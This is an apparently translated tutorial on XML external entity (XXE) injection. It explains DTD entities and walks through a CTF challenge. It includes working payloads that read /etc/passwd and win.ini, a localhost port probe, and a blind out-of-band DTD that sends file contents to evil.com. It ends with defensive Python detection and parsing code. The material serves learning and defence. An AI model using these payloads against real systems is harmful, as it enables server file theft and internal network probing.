0x00 Preface
This morning I saw an article on a public account saying that its author had found an XXE vulnerability in Starbucks and received a bounty, so I decided to take a look at this class of bug in the evening. XXE is short for XML External Entity injection.
Simply put, XXE is XML external entity injection. When a parser is allowed to resolve external entities, an attacker can craft malicious content to achieve arbitrary file reading, system command execution, intranet port probing, and attacks on intranet websites.
For example, if the application is written in PHP, you can call libxml_disable_entity_loader(true) to disable the loading of external entities, which defends against the attack.
XML Basics
Before introducing the XXE vulnerability, let's review the basics of XML. XML is designed to transmit and store data, with the focus on the content of the data. It separates data from HTML and is a software- and hardware-independent tool for transmitting information.

Entities are declared in the DTD. Internal entity:

```xml
<!ENTITY entity_name "entity value">
```

External entity:

```xml
<!ENTITY entity_name SYSTEM "URI">
```

Parameter entity:

```xml
<!ENTITY % entity_name "entity value">
```

or

```xml
<!ENTITY % entity_name SYSTEM "URI">
```

Example: general entity + internal entity

```xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
  <!ENTITY name "nMask">
]>
<foo>
  <value>&name;</value>
</foo>
```

Example: parameter entity + external entity

```xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
  <!ENTITY % name SYSTEM "file:///etc/passwd">
  %name;
]>
```

Note: %name; (a parameter entity) is referenced inside the DTD, while &name; (a general entity) is referenced in the XML document body.

Since XXE mainly exploits a DTD that references external entities, let's focus on what kinds of external entities can be referenced.

External entity
An external entity is declared in the DTD with the syntax

```xml
<!ENTITY entity_name SYSTEM "URI">
```

and takes its content from outside the document rather than from an inline value. So which URI types can be written there? Mainly file, http, https, ftp, etc. Of course, different parsers support different ones.

Example:

```xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
  <!-- define an external entity; SYSTEM "file:///xxxx" reads a file -->
  <!ENTITY content SYSTEM "file:///etc/passwd">
]>
<!-- the element name is arbitrary; it may or may not match the entity name -->
<foo>
  <value>&content;</value>
</foo>
```

The request must carry a Content-Type: application/xml header. If the request header is something like Content-Type: application/json, change it to Content-Type: application/xml and check whether the body is parsed as XML and an XXE vulnerability exists.
Here is a CTF challenge. The XXE lab built with bWAPP seems to have a problem: following the same steps as the article, the result did not match.

Challenge address: web.jarvisoj.com:9882

I captured the packet and found the following request (screenshot omitted). Change Content-Type to Content-Type: application/xml and send the following body to test whether XXE exists:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE sb [
  <!-- "XXE Test" is the content that will be output; xxe can be thought of as a variable -->
  <!ENTITY xxe "XXE Test">
]>
<!-- any element name will do -->
<em>
  <!-- referencing the entity expands it to its value in the output -->
  &xxe;
</em>
```
File read test (screenshot omitted), then reading the flag file. Since this is a Python environment, there is not much more that can be tested here. The response:

```http
HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 44
Server: Werkzeug/0.9.4 Python/2.7.6
Date: Wed, 27 Nov 2019 15:37:08 GMT

<em>
  CTF{XxE_15_n0T_S7range_Enough}

</em>
```
Listed directly here: if the XML document is parsed by PHP, the php://filter protocol can also be used to read files.

```xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
  <!ENTITY content SYSTEM "php://filter/resource=c:/windows/win.ini">
]>
<root><foo>&content;</foo></root>
```

Port Scanning
There are two ways to load an external DTD: private and public.

Private DTD loading:

```xml
<!ENTITY private_dtd SYSTEM "DTD_location">
```

Public DTD loading:

```xml
<!ENTITY public_dtd PUBLIC "DTD_name" "DTD_location">
```

When a public DTD is loaded, DTD_name is looked up first; if it cannot be found, DTD_location is used to fetch the DTD. Under certain conditions DTD_location can therefore be used for intranet probing.

```xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
  <!ENTITY portscan SYSTEM "http://localhost:3389">
]>
<root><foo>&portscan;</foo></root>
```

Blind XXE vulnerability:
In traditional XXE, an attacker can use the vulnerability to read server-side files only when the server echoes the result or returns an error. When there is no echo, blind XXE can be used to build an out-of-band channel to extract the data.

Using a DTD to exfiltrate the data
Sometimes reading a file produces no echo. In that case the parameter entity feature of the DTD can be used to splice the file contents into a URL, which achieves the file read.

```xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
  <!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=c:/windows/win.ini">
  <!ENTITY % dtd SYSTEM "http://192.168.1.100:8000/evil.dtd">
  %dtd;
  %send;
]>
<root></root>
```

evil.dtd:

```xml
<!ENTITY % payload "<!ENTITY &#x25; send SYSTEM 'http://evil.com/?content=%file;'>">
%payload;
```

In evil.dtd, the contents of the %file entity are concatenated into the URL; a tool such as Burp can then be used to view the resulting request and obtain the content we need.
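As an added, defender-side example (not code from the original post), here is a Python check that labels which of the DTD constructs covered above a request body uses, plus a parser wrapper that refuses any document carrying a DOCTYPE before handing it to ElementTree. The sample documents are constructed to mirror the payload shapes on this page, and the label names are my own.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample documents shaped like the payloads discussed above.
SAMPLE_CLEAN = '<?xml version="1.0"?><foo><value>hello</value></foo>'
SAMPLE_INTERNAL = '<!DOCTYPE sb [<!ENTITY xxe "XXE Test">]><em>&xxe;</em>'
SAMPLE_EXTERNAL = ('<!DOCTYPE a [<!ENTITY content SYSTEM "file:///etc/passwd">]>'
                   '<foo><value>&content;</value></foo>')
SAMPLE_BLIND = ('<!DOCTYPE root ['
                '<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=c:/windows/win.ini">'
                '<!ENTITY % dtd SYSTEM "http://192.168.1.100:8000/evil.dtd">'
                '%dtd;%send;]><root></root>')

DOCTYPE_RE = re.compile(r'<!DOCTYPE\b', re.I)
# Matches <!ENTITY [%] name ( SYSTEM "uri" | PUBLIC "id" "uri" | "literal" )>
ENTITY_RE = re.compile(
    r'<!ENTITY\s+(%\s*)?(\w+)\s+'
    r'(?:(SYSTEM|PUBLIC)\s+(?:"[^"]*"\s+)?"([^"]*)"|"([^"]*)")', re.I)

def classify(doc):
    """Label the DTD constructs in doc: doctype, internal-entity,
    external-entity, parameter-entity and scheme:<uri scheme>."""
    findings = set()
    if DOCTYPE_RE.search(doc):
        findings.add("doctype")
    for is_param, _name, kind, uri, _literal in ENTITY_RE.findall(doc):
        if is_param:
            findings.add("parameter-entity")
        if kind:  # SYSTEM or PUBLIC: the value is fetched from outside the document
            findings.add("external-entity")
            findings.add("scheme:" + uri.split(":", 1)[0].lower())
        else:
            findings.add("internal-entity")
    return findings

def parse_untrusted(doc):
    """Reject any document carrying a DTD, then parse it with ElementTree.
    Refusing the DOCTYPE blocks internal, external and parameter entity
    declarations alike (the same gate as defusedxml's forbid_dtd)."""
    if DOCTYPE_RE.search(doc):
        raise ValueError("DTD not allowed in untrusted XML")
    return ET.fromstring(doc)

def is_accepted(doc):  # True if parse_untrusted accepts doc, else False
    try:
        parse_untrusted(doc)
        return True
    except (ValueError, ET.ParseError):
        return False
```

The scheme labels make it easy to alert specifically on file, php or http external identifiers in logged request bodies, while the parse wrapper is the mitigation for the application itself.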